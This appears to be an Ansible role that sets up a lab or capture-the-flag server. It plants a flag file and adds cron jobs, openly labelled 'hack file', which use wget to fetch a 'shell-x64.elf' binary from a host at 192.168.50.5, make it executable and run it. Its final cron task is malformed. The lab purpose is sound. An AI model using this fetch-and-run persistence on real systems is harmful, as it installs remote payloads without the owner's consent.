---
# This is a role for setting up the server.

- name: Install packages
  apt:
    pkg:
     - wget
     - net-tools
     - wine
     - libwine
    update_cache: yes

- name: Place flag
  copy:
    dest: '/home/user/flag.txt'
    owner: 'server'
    content: "Top_Secret_Flag\n"
    mode: '0600'

- name: Create alias for client
  lineinfile:
    path: '/etc/hosts'
    line: '192.168.50.5 client'

- name: Cron job for get malicious file
  cron:
   name: "hack file get"
   minute: "1"
   job: "if [ ! -s /home/user/shell-x64.elf ]; then wget -O /home/user/shell-x64.elf http://192.168.50.5/shell-x64.elf; fi"

- name: Cron job make malicious file executable
  cron:
   name: "hack file executable"
   minute: "1"
   job: "if [ -s /home/user/shell-x64.elf ]; then chmod +x /home/user/shell-x64.elf; fi"

- name: Cron job for run malicious file
  cron:
   name: "hack file run"
   minute: "1"
   job: "if ! pidof -x /home/user/shell-x64.elf; then /home/user/shell-x64.elf; fi"

- name: kill every 3
  cron: "hack kill"
  minute: "3"
  job: "if pidof -x /home/user/shell-x64.elf; then pkill shell-x64.elf; fi"

...
